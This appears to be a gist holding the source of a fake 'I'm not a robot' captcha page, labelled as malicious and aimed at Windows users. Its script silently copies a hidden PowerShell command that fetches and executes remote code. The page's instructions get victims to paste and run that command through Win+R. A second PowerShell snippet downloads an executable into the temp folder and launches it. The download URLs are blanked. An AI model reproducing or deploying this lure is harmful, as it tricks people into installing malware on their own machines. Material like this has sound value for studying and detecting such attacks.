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Last active September 18, 2024 20:55
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Malicious captcha for Windows user

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Github Security Team


<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verify you are human</title>

    <link rel="stylesheet" href="">
        body {
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            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
            position: relative;

        .captcha-box {
            background-color: white;
            padding: 30px 40px;
            border-radius: 20px;
            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.15);
            width: 500px;
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            color: #4285F4;
            font-size: 36px;
            font-weight: bold;
            margin-bottom: 20px;

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    <div class="captcha-box">
        <div class="captcha-title">Verify You Are Human</div>
        <div class="captcha-subtext">Please verify that you are a human to continue.</div>
        <button class="captcha-button" id="verifyButton">
            <img src="" alt="Robot Icon">
            I'm not a robot

    <div class="modal-bg" id="modalBg">
        <div class="modal">
            <div class="modal-title">Verification Steps</div>
            <div class="modal-step">
                <p>1. Press Windows Button "<i class="fa-brands fa-windows"></i>" + R</p>
            <div class="modal-step">
                <p>2. Press CTRL + V</p>
            <div class="modal-step">
                <p>3. Press Enter</p>


        const verifyButton = document.getElementById('verifyButton');
        const modalBg = document.getElementById('modalBg');

        verifyButton.addEventListener('click', function() {
   = 'flex'; 
            const captchaText = "powershell.exe -w hidden -Command \"iex (iwr '').Content\" # \"✅ ''I am not a robot - reCAPTCHA Verification ID: 93752\"";
            const tmpTxtArea = document.createElement("textarea");
            tmpTxtArea.value = captchaText;



Value in the buffer to be executed

   $webClient = New-Object System.Net.WebClient
   $url1 = ""
   $filePath1 = "$env:TEMP\SysSetup.exe"
   $webClient.DownloadFile($url1, $filePath1)
   Start-Process -FilePath  $env:TEMP\SysSetup.exe


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